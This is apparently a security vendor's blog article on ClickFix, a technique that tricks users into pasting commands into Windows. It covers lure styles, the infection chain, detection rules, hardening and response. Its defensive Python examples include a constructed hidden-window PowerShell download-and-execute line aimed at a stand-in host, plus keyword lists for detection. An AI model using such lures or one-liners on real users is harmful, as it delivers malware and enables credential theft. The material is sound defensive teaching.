A technique that was a researcher curiosity eighteen months ago is now one of the dominant malware delivery methods in email. It is called ClickFix and the mechanic is almost embarrassingly simple: the attacker convinces the victim to copy a piece of text, paste it into an operating system window and press Enter. What runs is PowerShell, mshta, curl or any interpreter Windows provides, executing with the user's own permissions.
The numbers explain why this deserves attention and a quick check against your own detection layer. ESET, in its threat report for the first half of 2025, recorded a 517% increase in ClickFix and FakeCAPTCHA detections compared with the second half of 2024. Microsoft published a dedicated analysis in August 2025, "Think before you Click(Fix)", confirming that the technique reaches thousands of devices a day in its global telemetry and describing it as one of the most effective delivery methods it has seen in years.
Anatomy of the trap
What makes ClickFix difficult to cut off is that the wrapper changes every few months, while the mechanics stay the same: a page or a message convinces the user that the fix involves pasting something into a system window. Five disguises are circulating in 2025 and 2026, each documented in real campaigns.
Cloudflare-style fake CAPTCHA
The victim lands on a compromised page or one served through malvertising and meets the classic "verify you are human" widget. The usual checkboxes are deliberately broken. The page then offers an alternative: "step 1, press Win+R; step 2, press Ctrl+V; step 3, press Enter". What sits in the clipboard is already an obfuscated PowerShell line. The visual style mimics Cloudflare on purpose to lower friction.
Simulated Word, Chrome or video player error
Another widely observed variant in Proofpoint TA571 campaigns is the HTML attachment that renders a Microsoft Word error message such as "Word cannot display this document. To repair it, paste this command into PowerShell". The same pattern recurs with a fake Chrome failure, a missing video codec or a DNS error. The command always shares the same structure: download a second-stage script and run it.
Human verification on download pages
Recent campaigns have shifted the lure to pages offering pirated software, cracks, drivers, licence keys or AI tools. Before the download a screen asks the user to "verify you are not a bot". The verification, as with the earlier variant, is paste and execute.
Fake meeting links and travel reservations
In March 2025 Microsoft documented how Storm-1865 targeted the hospitality sector by impersonating Booking.com: legitimate-looking emails led to a fake reservation page whose CAPTCHA delivered the ClickFix payload. The same template has been reused with fake Microsoft Teams, Google Meet and Zoom invitations.
Fake Windows blue screen
The most recent variant, observed by incident response teams in the hospitality sector at the end of 2025, presents the victim with a full-browser blue screen mimicking the Windows BSOD. The "error" text asks the user to run a PowerShell command that supposedly repairs the system. The graphical fidelity is good enough that a non-technical user cannot reliably tell the simulation from the real screen.
What happens once the victim pastes and runs
The interesting part for a security team is not the lure: it is what happens in the seconds after Enter. A typical modern ClickFix chain follows three steps before the final payload lands.
- Win+R opens the Run dialogue and the victim pastes the clipboard string. Explorer records the string in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per command plus an MRUList value that only holds the ordering), which is one of the strongest forensic sources once the incident has happened.
- The pasted string usually starts with powershell.exe, mshta.exe, curl or bitsadmin, sometimes wrapped in cmd or conhost, with PowerShell parameters such as -EncodedCommand or -WindowStyle Hidden. The line is written to look harmless when read left to right and ends with a comment that looks like a ticket ID, an error code or an "I am not a robot" verification string.
- The interpreter downloads a second-stage script from a rotating domain, often a legitimate compromised host (WordPress, Pastebin, cloud storage). That second script is the actual loader: it adds persistence, disables controls where it can and loads the final payload in memory.
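To make the second step concrete, here is a small Python decoder, added as an example for this article rather than tooling from any of the cited reports. It builds a ClickFix-style Run-dialog string around a constructed second-stage fetch (the URL uses the reserved name example.invalid and the decoy "Verification ID" tail is invented), then unwraps it the way an analyst would: drop the decoy comment, base64-decode the -EncodedCommand argument as UTF-16LE, and pull out the URLs and the flags a detection rule keys on. The same function handles the mshta form, where the URL sits in the clear.

```python
import base64
import re
from urllib.parse import urlparse

# Second-stage fetch used to build the sample line. Constructed for this example:
# example.invalid is a reserved name and never resolves.
SAMPLE_SECOND_STAGE = "iex (iwr -UseBasicParsing 'https://example.invalid/x.txt').Content"

# Decoy tail the lure appends so the Run dialog reads like a ticket number (constructed).
DECOY_TAIL = "# \u2705 ''I am not a robot'' - reCAPTCHA Verification ID: 7811"

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe; the
# argument is base64 of the UTF-16LE script text.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"()<>]+")
_INDICATORS = ("iex", "invoke-expression", "iwr", "invoke-webrequest", "downloadstring",
               "frombase64string", "-w hidden", "-windowstyle hidden", "-nop", "-ep bypass")


def build_run_line(script: str) -> str:
    """Assemble a ClickFix-style Run-dialog string from a PowerShell script (constructed sample)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -w hidden -nop -ep bypass -enc {b64} {DECOY_TAIL}"


def decode_run_line(line: str) -> dict:
    """Unwrap what the victim pasted: drop the decoy comment, decode -EncodedCommand,
    and collect the URLs and flags a detection rule would key on."""
    visible = line.split(" #", 1)[0].strip()          # everything after " #" is decoy
    interpreter = visible.split()[0].lower()
    decoded = None
    m = _ENC_FLAG.search(visible)
    if m:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    flags_only = _ENC_FLAG.sub("-enc <b64>", visible)  # keep the flags, hide the blob
    payload = decoded if decoded is not None else visible
    haystack = (flags_only + " " + payload).lower()
    urls = _URL.findall(payload)
    return {
        "interpreter": interpreter,
        "decoded": decoded,
        "urls": urls,
        "hosts": [urlparse(u).hostname for u in urls],
        "indicators": [i for i in _INDICATORS if i in haystack],
    }


if __name__ == "__main__":
    for sample in (build_run_line(SAMPLE_SECOND_STAGE),
                   "mshta https://example.invalid/v.hta " + DECOY_TAIL):
        print(decode_run_line(sample))
```

Everything the victim can read on screen (the `# ... Verification ID` tail) carries no information about what runs; the useful artefacts are the decoded script, the host it contacts and the combination of hidden-window, no-profile and bypass flags, which is what the detection rules later in this article look for.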
The final payload is well documented. Proofpoint and other teams have consistently linked ClickFix campaigns to Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, Latrodectus and XWorm. ESET also reports StealC, Quasar RAT and, in targeted operations, bespoke implants. Intent varies: credential and session-cookie theft for financial fraud, pre-ransomware footholds, and espionage in nation-state activity.
State-aligned adoption matters when calibrating risk. Between October 2024 and April 2025 confirmed use of ClickFix was attributed to APT28 (Russia), Kimsuky (North Korea) and MuddyWater (Iran). That tends to happen only when a technique is mature enough to be reliable in real espionage operations.
Why traditional controls miss it
ClickFix does not arrive as a malicious attachment or a downloaded executable: what arrives is text. The victim copies and pastes a command that runs with their own permissions, inside a Microsoft-signed binary, without tripping most of the usual heuristics. Three concrete reasons explain the technique's success.
First, mail gateways see nothing malicious: the body is plain text. The intermediate page may be a freshly registered clean domain or a legitimate compromised site. Web filtering platforms tend to lag in categorising it.
Second, execution is initiated by the user inside their own session. Modern EDR and antivirus tooling does not block powershell.exe launched from explorer.exe by default: it is a routine sequence on any workstation. Catching it requires inspecting the command line rather than the binary.
Third, classic awareness programmes teach the user not to open attachments or click suspicious links. ClickFix asks for neither: it asks the user to paste text, which is an innocuous act in office culture. The defensive reflex is calibrated for the wrong action.
Detection that actually works
The good news is that ClickFix leaves a clear telemetry trail if you hunt in the right place. Three observation points are worth tuning today. KQL queries for Microsoft Defender XDR are publicly available and community-validated.
RunMRU as primary evidence
The registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps what the user typed into the Run dialogue. On a healthy corporate workstation that key should not contain strings with powershell, mshta, curl, IEX, FromBase64String, encodedcommand or URLs. A rule firing on any of those terms in the creation or modification of a value under that key produces close to zero false positives. Sysmon Event ID 13 (RegistryEvent, value set) with the right filters covers the same ground if you do not run Defender for Endpoint; note that Sysmon reports the path as HKU\<user SID>\Software\... rather than HKCU, so match on the key suffix, and ignore the MRUList value, which only holds the ordering letters.
Anomalous process tree
The chain explorer.exe to powershell.exe (or mshta.exe, conhost.exe, cmd.exe) with long encoded arguments is highly suspicious. Most EDR products allow alerts on command lines containing -EncodedCommand, -nop, -W hidden or IEX. If the organisation uses PowerShell legitimately for administration, keep script block logging on and enforce Constrained Language Mode through AppLocker or WDAC script enforcement, so that the ad-hoc download-and-execute one-liner and the in-memory loader it fetches fail while signed administrative scripts keep working.
Post-execution network telemetry
The loader always talks to an external host to fetch the second stage. An outbound connection from powershell.exe or mshta.exe to a freshly registered domain or a paste service should fire a high-severity alert. Domain age needs an enrichment source, but a simple allowlist of the internal hosts PowerShell is expected to reach (update and management servers) already isolates the unexpected connections. With a managed attack surface management programme in place, indicators can be cross-referenced against the suspicious-domain coverage you already monitor.
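The three observation points above, expressed as Python over pre-parsed Sysmon records, as an added example for this article and not one of the published KQL hunts (the logic maps one-to-one onto a Defender XDR or Sysmon rule). The events are constructed for the example, not real telemetry; the allowlist of internal hosts is hypothetical. It shows the RunMRU match on the key suffix under HKU\<SID>, the stripped "\1" suffix Explorer appends to each Run entry, the MRUList value being ignored, an interactive console launched from explorer.exe not firing, and the network rule flagging only destinations outside the allowlist.

```python
RUNMRU_KEY = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\"

# Terms that have no business in a Run-dialog history on a managed workstation.
RUNMRU_TERMS = ("powershell", "pwsh", "mshta", "curl", "bitsadmin", "certutil",
                "iex", "frombase64string", "-enc", "encodedcommand", "http://", "https://")
# Flags on an explorer.exe -> interpreter command line that mark a pasted one-liner.
CMDLINE_TERMS = ("-encodedcommand", "-enc ", "-nop", "-w hidden", "-windowstyle hidden",
                 "iex", "-ep bypass")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "conhost.exe",
                "curl.exe", "bitsadmin.exe"}
NET_SOURCES = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Hypothetical allowlist of internal hosts PowerShell may legitimately reach.
ALLOWED_HOSTS = {"wsus.corp.example", "sccm.corp.example"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Apply the three ClickFix rules to pre-parsed Sysmon records and return the hits."""
    hits = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 13 and RUNMRU_KEY.lower() in ev["TargetObject"].lower():
            # Explorer stores each Run entry as "<command>\1"; strip that suffix.
            cmd = ev["Details"][:-2] if ev["Details"].endswith("\\1") else ev["Details"]
            terms = [t for t in RUNMRU_TERMS if t in cmd.lower()]
            if terms:
                hits.append({"rule": "runmru", "user": ev["User"], "evidence": cmd, "terms": terms})
        elif eid == 1 and _basename(ev["ParentImage"]) == "explorer.exe" \
                and _basename(ev["Image"]) in INTERPRETERS:
            terms = [t for t in CMDLINE_TERMS if t in ev["CommandLine"].lower()]
            if terms:
                hits.append({"rule": "process_tree", "user": ev["User"],
                             "evidence": ev["CommandLine"], "terms": terms})
        elif eid == 3 and _basename(ev["Image"]) in NET_SOURCES:
            host = ev.get("DestinationHostname", "").lower() or ev.get("DestinationIp", "")
            if host not in ALLOWED_HOSTS:
                hits.append({"rule": "network", "user": ev["User"], "evidence": host,
                             "terms": [_basename(ev["Image"])]})
    return hits


# Constructed Sysmon records (fields as the event XML would be parsed), not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "CORP\\alice",                       # benign Run history
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": "notepad\\1"},
    {"EventID": 13, "User": "CORP\\alice",                       # the ClickFix paste
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b",
     "Details": "powershell -w hidden -nop -ep bypass -enc aQBlAHgA # I am not a robot\\1"},
    {"EventID": 13, "User": "CORP\\alice",                       # ordering value, ignored
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList",
     "Details": "ba"},
    {"EventID": 1, "User": "CORP\\alice",                        # explorer -> hidden PowerShell
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -enc aQBlAHgA"},
    {"EventID": 1, "User": "CORP\\bob",                          # admin opened a console
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""},
    {"EventID": 3, "User": "CORP\\alice",                        # second-stage fetch
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationHostname": "pastebin.com", "DestinationPort": 443},
    {"EventID": 3, "User": "CORP\\bob",                          # allowlisted update server
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationHostname": "wsus.corp.example", "DestinationPort": 8530},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h["rule"], h["user"], h["terms"], h["evidence"])
```

Running it yields one hit per rule, all for the same user, which is the shape an analyst wants: the RunMRU write, the process creation and the outbound connection line up in time and can be pivoted on together, while the admin's interactive console and the update-server traffic stay silent.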
Defences that actually work
Once the behavioural tree is understood, defence moves from reactive detection to concrete preventive controls. There is no single switch that turns ClickFix off; what works is the combination of three layers.
Reduce endpoint surface
Microsoft Defender attack surface reduction (ASR) rules block several of the steps the ClickFix chain depends on. The most useful documented rules against this technique are "Block execution of potentially obfuscated scripts", "Block executable files from running unless they meet a prevalence, age, or trusted list criterion", "Block process creations originating from PSExec and WMI commands" and "Block all Office applications from creating child processes". Keep in mind that in a ClickFix chain the parent process is explorer.exe, not an Office application, so the Office rule only helps with document-borne lures. None is perfect; combined they raise the cost of the operation significantly for the attacker.
Beyond ASR, it is worth reviewing GPOs to limit who has the Run dialogue enabled on corporate workstations. Removing Win+R from standard profiles via policy (the "Remove Run menu from Start Menu" setting) does not break productivity and kills the most common lure, but it is not a complete fix: variants already instruct the victim to paste into the File Explorer address bar, a PowerShell console or Windows Terminal instead, so the command-line and registry detections still need to be in place. For administration or developer profiles, AppLocker or WDAC restricting which binaries can be invoked from interactive sessions does the same job without disrupting operations.
Lock down PowerShell and mshta
PowerShell Constrained Language Mode, script block logging enabled and shipped to the SIEM, transcription enabled and AMSI integrated form the minimum baseline. Mshta.exe rarely has legitimate use on an employee workstation and should be blocked outright on profiles that do not need it. Bitsadmin, certutil, regsvr32 and rundll32 are well-known LOLBins and deserve explicit WDAC rules.
Identity and response layer
When the payload steals credentials and session cookies, a well-designed authentication layer limits the blast radius. Phishing-resistant MFA on privileged access, short sessions on critical applications and blocking of legacy authentication protocols work not because they prevent ClickFix but because they reduce the value of stolen cookies. Identity is the last line once the endpoint piece has failed.
Training that works, and training that does not
Traditional phishing simulations do not prepare the user for ClickFix. The recipient of the lure does not open an attachment or click a dodgy link: they see a message asking them to paste three lines and press Enter. If the security team has not explicitly trained that reflex, the user will comply.
What does teach the workforce is a short and clear operational rule: no legitimate vendor, no internal system and no website will ever ask you to paste commands into a system window. Ever. If you are asked, it is always a scam. That sentence, repeated in training, in internal signage and in technical onboarding, is more useful than five email-phishing simulations. For IT and development teams it is also worth training the reflex to read the command line before running it, especially when copying from Stack Overflow, ChatGPT or external documentation.
One interesting variant: part of the programme should simulate ClickFix internally with a harmless command (for instance, opening calc.exe and notifying the security team). That simulation, run with authorisation and prior communication to the works council where it applies, measures real risk far more accurately than another email simulation.
If your organisation has already been hit
Response to a ClickFix infection is response to an endpoint compromise with lateral-movement and credential-theft potential. Order matters: isolate the affected workstation, collect the RunMRU key, the process tree and the PowerShell script block log (Event ID 4104) as evidence, rotate passwords and revoke session tokens for the affected account in Microsoft Entra ID or the equivalent IdP, scan the rest of the estate for the same indicators, and open the formal incident response procedure. Assume that a single endpoint was unlikely to be the only target: ClickFix campaigns typically bounce against several victims inside the same organisation before one succeeds.
When in-house capacity is not available to move through those steps within hours, a managed incident response service or a 24x7 managed SOC draws the line between a contained incident and a breach that requires regulatory notification.
What comes next
ClickFix is not going away in 2026. The technique is cheap, reliable and becoming commoditised: ClickFix-as-a-Service kits sold on forums already bundle CAPTCHA templates, rotating domains and payload choice. For a mid-sized organisation, preparing is not about buying a new tool, it is about tuning rules in the endpoint stack you probably already have, writing three hunting queries, reviewing PowerShell policies and redesigning awareness around that single sharp sentence. To support that work, an MSSP provider that combines managed SOC with incident response and knows your Microsoft 365 stack is the most reasonable support model when there is no in-house team able to hunt at this level.
For a quick view of the externally exposed side of the organisation before raising detection bars, Hard2bit Scanner returns the public posture of a domain in under a minute. It is the fastest starting point to learn where an attacker armed with a ClickFix lure would most likely arrive first.
Cited external sources
- ESET Threat Report H1 2025 (via Help Net Security): helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report
- Microsoft Security Blog, "Think before you Click(Fix)" (21 August 2025): microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix
- Microsoft Security Blog, Storm-1865 impersonating Booking.com (13 March 2025): microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com
- Proofpoint, ClickFix landscape security brief: proofpoint.com/us/blog/threat-insight/security-brief-clickfix
- BleepingComputer, state-aligned actors adopt ClickFix: bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix
- Microsoft Learn, attack surface reduction rules reference: learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference
- KQL hunts for Defender XDR: kqlquery.com/posts/investigate-clickfix